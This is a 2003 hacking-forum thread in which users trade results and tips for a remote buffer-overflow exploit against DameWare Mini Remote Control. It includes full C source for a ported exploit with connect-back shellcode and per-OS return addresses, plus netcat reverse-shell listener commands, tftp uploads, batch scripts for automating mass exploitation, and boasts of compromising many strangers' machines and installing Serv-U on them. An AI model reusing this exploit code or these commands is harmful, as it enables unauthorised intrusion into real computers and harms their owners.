Dameware Mini Remote Control V3.73 Remote Exploit

Jurojin

Dec 21 2003, 08:37 PM

No.. its just that he probably hasn't set netcat to listen on that port for incomming connections. Anyway, I have got a shell but whenever I try to install ServU I get Permission Denied even though I have stopped the Anti Virus and can Start/Stop Services, any idea's ?

UnDeRTaKeR

Dec 21 2003, 09:36 PM

well i dont have complaints... it all worked perfect for me...
i got something like 20 shells from that nice exploit

knientje

Dec 21 2003, 10:44 PM

QUOTE (X-FloppY @ Dec 21 2003, 06:23 PM)

Chill m8 ppl is coming to learn
btw it's nc -l -vv -p port

EnjoY

thanks dude, that works!

anybody know how to config the shit if you are on a network?

DrDoc

Dec 21 2003, 10:57 PM

BIG THX 4 da exploit

I has try it at my Server and it works well

Big thx

Very Funny Think

Cya Doc

JaANDniET

Dec 21 2003, 11:17 PM

w00t
work better then the other one

just trying to add universal offsets

greetz

LiQuid

Dec 21 2003, 11:39 PM

This Exploit works fine, but there are less vulnerable IP´s...

Blast3rPL

Dec 21 2003, 11:49 PM

I have a question. I'm gonna test it on my machine, I installed Dameware NT 3.73 and run it. Then I setup nc :

CODE

nc.exe -l -p 4949 -e cmd.exe

Then I'm trying to connect by dameweird exploit (from morning_wood)

CODE

dameweird.exe MYIP MYIP 4949

But It sends me Connection Refused. I turn off firewalls etc. but i'm behind NAT.

I even tried
dameweird.exe 127.0.0.1 127.0.0.1 4949
But it sends me connection refused. It little freaky ...

Please Help Me

Dr00py

Dec 22 2003, 12:08 AM

Nice Exploit

, works perfect for me.

mastervampire

Dec 22 2003, 01:12 AM

has anyone been able to get that tftp thing working on a computer u got into ?

i even tried to upload a 4 byte text file and still timeout!

tftp -i 11.11.11.11 get text.txt
timeout occured

fandango

Dec 22 2003, 02:04 AM

thank you very much for sharing this new exploit

vnet576

Dec 22 2003, 02:10 AM

QUOTE (mastervampire @ Dec 21 2003, 08:12 PM)

has anyone been able to get that tftp thing working on a computer u got into ?

i even tried to upload a 4 byte text file and still timeout!

tftp -i 11.11.11.11 get text.txt
timeout occured

use echo ftp instead...search for it on the board for specific instructions.

mastervampire

Dec 22 2003, 03:58 AM

couldnt find jack on echo ftp, what is it and how to use it?

Killahbee

Dec 22 2003, 06:41 AM

QUOTE (Jurojin @ Dec 21 2003, 08:37 PM)

No.. its just that he probably hasn't set netcat to listen on that port for incomming connections. Anyway, I have got a shell but whenever I try to install ServU I get Permission Denied even though I have stopped the Anti Virus and can Start/Stop Services, any idea's ?

course netcat is listening, i'm not that stupid, just not lucky enough

Diablotic

Dec 22 2003, 10:13 AM

QUOTE (Blast3rPL @ Dec 21 2003, 11:49 PM)

I have a question. I'm gonna test it on my machine, I installed Dameware NT 3.73 and run it. Then I setup nc :

CODE

nc.exe -l -p 4949 -e cmd.exe

Then I'm trying to connect by dameweird exploit (from morning_wood)

CODE

dameweird.exe MYIP MYIP 4949

But It sends me Connection Refused. I turn off firewalls etc. but i'm behind NAT.

I even tried
dameweird.exe 127.0.0.1 127.0.0.1 4949
But it sends me connection refused. It little freaky ...

Please Help Me

Damn! You are here, I can only said LOL.
127.0.0.1 - That is greeat, i think in this method you'll get a lot of shells, especially if you are behind a NAT

ROTFL

Merchantp

Dec 22 2003, 11:02 AM

bleh 5 pages of the same stuff neway heres an idea maybe your router isnt letting the incoming connections through maybe you should change your router settings to allow it maybe you should use another box to accept the connections that isnt on a lan maybe maybe maybe

Merchantp

Dec 22 2003, 11:07 AM

QUOTE

I have a question. I'm gonna test it on my machine, I installed Dameware NT 3.73 and run it. Then I setup nc :

CODE
nc.exe -l -p 4949 -e cmd.exe

Then I'm trying to connect by dameweird exploit (from morning_wood)

CODE
dameweird.exe MYIP MYIP 4949

But It sends me Connection Refused. I turn off firewalls etc. but i'm behind NAT.

I even tried
dameweird.exe 127.0.0.1 127.0.0.1 4949
But it sends me connection refused. It little freaky ...

Please Help Me

i may not know what im talking about but i dont think it works on 3.73 m8 considering they put out a new version (3.73) that fixes this sploit.

but i may be wrong.

zero-maitimax

Dec 22 2003, 11:53 AM

it should work on that version. the newest version is v 4.0.0.0

Merchantp

Dec 22 2003, 12:25 PM

so the servers a diffnt version than the client bleh =/

101

Dec 22 2003, 01:09 PM

Kralor exploit is just a dupe of wirepair ... , becos mister wp did it also working on NT4 ....

nice try kralor but wp own

XtrA

Dec 22 2003, 01:48 PM

this is good :]
but how can i defend on this in the victim`s computer?
can anyone explain me?

the

Dec 22 2003, 01:55 PM

QUOTE (XtrA @ Dec 21 2003, 07:47 AM)

plz help me!!
now i get in one :]]]]
im in his computer uploaded files and typed
net start serv-u but see:

CODE

net start serv-u
The Serv-U FTP Server service is starting.
Serv-U FTP Server service could not be started.
A service specific error occurred: 100.
More help is available by typing NET HELPMSG 3547.

what now?
what can i do ? :\\\\\

that means that some kind of a serv-u server is allready running on that box
greetz

DrDoc

Dec 22 2003, 02:19 PM

QUOTE (ma622 @ Dec 21 2003, 09:35 AM)

could anyone build a proggy which checks the scan.txt for vuln ips and promts it to output.txt without dropping to shell?

This is a great idea.. and i think it is not very difficult to code it..

But my programming knowledge is so bad that i have not the possibility to to that

Anybody out there who could help..

plz

Big Thx 4 our help

Cya Doc

LoCaliSe

Dec 23 2003, 12:38 AM

When I use this exploit, i've Got reply like PATCHED, with what it's patched ?

Toxi

Dec 23 2003, 12:51 AM

QUOTE (LoCaliSe @ Dec 23 2003, 12:38 AM)

When I use this exploit, i've Got reply like PATCHED, with what it's patched ?

It means that the computer you are trying to exploit has newer version than 3.73.
Newer versions are exploitable too with private exploit(I don't own this).

CODE

[+] Connecting to 130.x.x.x ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 4
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Patched

LoCaliSe

Dec 23 2003, 01:03 AM

Yep Like this, so i cann't patched this version, i do upgrade this

Ok, Thanks

redcorp

Dec 23 2003, 04:28 AM

very nice exploit man ....first one i tried i got a shell

ur a champion

Fernando093

Dec 23 2003, 07:34 AM

eXcellent job guys, thanks a lot for the info,,,,,,,,,,,,,,,,,

U rock fellas,,,,,,, U ROCK !!!!!!

Blast3rPL

Dec 23 2003, 10:06 AM

Diablotic LOL, I'm only want to test it on local you lame man. I may be behind NAT if I exploiting my local machine buahahaha. I've already know what I't required have active IP but in local it don't lame man. buahahahahahahahaah

Progressor

Dec 23 2003, 12:39 PM

This exploit is very good, i got a lot of shells... just keep trying.

ivan288

Dec 23 2003, 01:02 PM

its dead guys, well at least on the good ranges.

Diablotic

Dec 23 2003, 01:11 PM

QUOTE (ivan288 @ Dec 23 2003, 01:02 PM)

its dead guys, well at least on the good ranges.

Ohhhh don't say like that. I am still making some 100mbits. Everyday at least 5 so it isn't dead but probably will be soon

And then we'll have to wait for another exploit

klassik

Dec 23 2003, 01:34 PM

I've noticed that sometimes even if it does bork dw, It does not send the packet to connect back to you.

LoCaliSe

Dec 23 2003, 01:43 PM

Create a dameware.bat file with that :

dame %1 yourip port
nc -l -vv -p port

and when you are an ip -----> dameware ipfound

You should be Connect automaticly

* dame it's the name of your exploit

AlexeyG

Dec 23 2003, 02:57 PM

does this still work?

Diablotic

Dec 23 2003, 03:11 PM

There is less and less vuln but you can try but you have to be fast

AlexeyG

Dec 23 2003, 03:23 PM

yes, I have noticed that u have to be fast
I am sitting on this all day and just know I found that it is my speed...
dunno what to do :S

[Ripper]

Dec 23 2003, 03:45 PM

gonna try it cheers

X-FloppY

Dec 23 2003, 06:57 PM

almost no shells now
all patched ;X

Neo2k

Dec 23 2003, 08:33 PM

the same thing, i'm too late, all the serv are PATCHED

zero-maitimax

Dec 23 2003, 08:55 PM

all patch :S i think you ppl aren't search good

start at 217.80.2.0 maybe you have luck to..

some ppl at that range have the port on 53 ...

Divx_dude

Dec 24 2003, 12:34 AM

well if ya wanne find some

its getting hard cuz many people have the great conections

rooted

so if someone could build a bat file that autocheck the ip list

LethalWordz

Dec 24 2003, 02:35 AM

Yea that'd be cool, I was hoping someone would make a new one with better offsets. I gotta look into that too though.

taktau

Dec 24 2003, 02:45 AM

someone, please

CODE

[root@localhost exploits]# gcc -o DameWeird DameWeird.c
DameWeird.c:18:21: winsock.h: No such file or directory
DameWeird.c:19:21: windows.h: No such file or directory
DameWeird.c: In function `cnx':
DameWeird.c:94: storage size of `yeah' isn't known
DameWeird.c:97: `AF_INET' undeclared (first use in this function)
DameWeird.c:97: (Each undeclared identifier is reported only once
DameWeird.c:97: for each function it appears in.)
DameWeird.c:97: `SOCK_STREAM' undeclared (first use in this function)
DameWeird.c:106: warning: assignment makes pointer from integer without a cast
DameWeird.c:107: dereferencing pointer to incomplete type
DameWeird.c:107: dereferencing pointer to incomplete type
DameWeird.c:109: `INADDR_NONE' undeclared (first use in this function)
DameWeird.c: In function `main':
DameWeird.c:282: `WSADATA' undeclared (first use in this function)
DameWeird.c:282: parse error before "wsaData"
DameWeird.c:290: `wsaData' undeclared (first use in this function)
DameWeird.c:299:2: warning: no newline at end of file

vnet576

Dec 24 2003, 03:00 AM

dameware is a windows exploit hence the winsock header files...u have to compile it in windows.

r4BBiT

Dec 24 2003, 04:56 AM

QUOTE (taktau @ Dec 24 2003, 02:45 AM)

someone, please

CODE

[root@localhost exploits]# gcc -o DameWeird DameWeird.c
DameWeird.c:18:21: winsock.h: No such file or directory
DameWeird.c:19:21: windows.h: No such file or directory
DameWeird.c: In function `cnx':
DameWeird.c:94: storage size of `yeah' isn't known
DameWeird.c:97: `AF_INET' undeclared (first use in this function)
DameWeird.c:97: (Each undeclared identifier is reported only once
DameWeird.c:97: for each function it appears in.)
DameWeird.c:97: `SOCK_STREAM' undeclared (first use in this function)
DameWeird.c:106: warning: assignment makes pointer from integer without a cast
DameWeird.c:107: dereferencing pointer to incomplete type
DameWeird.c:107: dereferencing pointer to incomplete type
DameWeird.c:109: `INADDR_NONE' undeclared (first use in this function)
DameWeird.c: In function `main':
DameWeird.c:282: `WSADATA' undeclared (first use in this function)
DameWeird.c:282: parse error before "wsaData"
DameWeird.c:290: `wsaData' undeclared (first use in this function)
DameWeird.c:299:2: warning: no newline at end of file

here u go, i ported it to nix, i didnt test it tho

CODE

root@hell:~# gcc -o dameware dameware.c
root@hell:~# ./dameware

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]
www.coromputer.net && undernet #coromputer

syntax: ./dameware <host> <your_ip> <your_port>

CODE

/ ********************************************************************************
******/
/* [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt] */
/* - - - - - - - - - - - - - - - - - - - - - */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68 v3.72 */
/* In comments there's some information about offsets for jmp esp on diff OS. */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format) */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in */
/* the shellcode.Some people reported me 2 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I can't find */
/* another better EIP for XP (hope this 2 offsets will be enough). */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values. */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/ ********************************************************************************
******/

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4

// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
// jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
// jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3

/*
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

#define RET "\xB8\x64\x75\x71"
#define RET_XP "\x07\xD5\x36\x77"
// or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

/*
void print_packet(char *buffer, int begin, int end)
{
int i,j;
char ascii[9];

for(i=begin,j=0;i<end;i++,j++) {
if(i%10==0) {
printf("\r\n%04d: ",i);
j=0;
memset(ascii,0,sizeof(ascii));
}
printf("0x%02x ",(unsigned char)buffer[i]);
if(i%10==9) {
ascii[10]=0x00;
printf("%s",ascii);
}
if(!isprint(buffer[i]))
ascii[j]='.';
else
ascii[j]=buffer[i];
}
printf("%s\r\n",ascii);
return;
}
*/

int cnx(char *host)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;

sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons(PORT);

if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}

void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
unsigned int ip=0;
unsigned short port=0;
char *port_to_shell="",*ip1="";

ip = inet_addr(rhost); ip1 = (char*)&ip;
shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

port = htons(rport);
port_to_shell = (char *) &port;
shellc0de[319]=port_to_shell[0]^0x95;
shellc0de[320]=port_to_shell[1]^0x95;

switch(os)
{
case 0: // win2k
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WIN2K_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WIN2K_SP1;
break;
case 2:
*(long*)&shellc0de[0]=RET_WIN2K_SP2;
break;
case 3:
*(long*)&shellc0de[0]=RET_WIN2K_SP3;
break;
case 4:
*(long*)&shellc0de[0]=RET_WIN2K_SP4;
break;
}
*/
break;
case 1: // winXP
shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WINXP_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WINXP_SP1;
break;
}
*/
break;
}
return;
}

int start_auth(int sock, char *rhost, int rport)
{
int size,i=4,os,sp;
char buffer[SIZEOF];
char shellc0de[] =
"\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
"\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
"\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
"\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
"\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
"\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
"\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
"\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
"\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
"\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
"\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
"\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
"\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
"\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
"\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
"\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
"\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
"\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
"\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
"\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
"\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
"\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
"\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
"\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
"\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s ...","information");
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
sp=(unsigned int)buffer[37];
printf("[i] Operating system : ");
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
printf("\r\n[i] Service Pack : %s\r\n",&buffer[37]);
printf("[+] Setting shellc0de for this %-15s ...","version");
set_sc(os,sp,rhost,rport,shellc0de);

memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
memset(&buffer[416],0x90,180);
if(os==0)
memcpy(&buffer[516],RET,4);
else
memcpy(&buffer[516],RET_XP,4);
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);
printf("Done\r\n");
printf("[+] Sending evil %-30s ...","packet");
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
size=recv(sock,buffer,SIZEOF,0);

if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}

void banner(void)
{
printf("\r\n [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}

int main(int argc, char *argv[])
{
int sock;

banner();
if(argc!=4) {
printf("syntax: %s <host> <your_ip> <your_port>\r\n",argv[0]);
return -1;
}

sock=cnx(argv[1]);
if(!sock)
return -1;
start_auth(sock,argv[2],atoi(argv[3]));
return 0;
}

Feanor

Dec 24 2003, 12:23 PM

I've compiled and run the exploit all right, but can't get shell anywhere, guess that's because the machines i'm trying to get shell on are not running Damerware version v3.73

Anybody knows a way to check what version is that machine running(axcept just trying all the IPs one by one).

X-FloppY

Dec 24 2003, 02:46 PM

what is this code?

jimmy

Dec 24 2003, 06:39 PM

sure it's almost dead ...

MpR

Dec 24 2003, 09:02 PM

Gotta love how people want want want .. You can never give them enough to be happy .. Had this sploit before I came here dude but want to say thanks all the same works well over and easy aslong as youre willing to learn as alot proved by posts they are not .. I hope they cant get it compiled as they dont deserve.

Thanks

vnet576

Dec 24 2003, 09:45 PM

QUOTE (MpR @ Dec 24 2003, 04:02 PM)

Gotta love how people want want want .. You can never give them enough to be happy .. Had this sploit before I came here dude but want to say thanks all the same works well over and easy aslong as youre willing to learn as alot proved by posts they are not .. I hope they cant get it compiled as they dont deserve.

Thanks

and leave more for the rest of us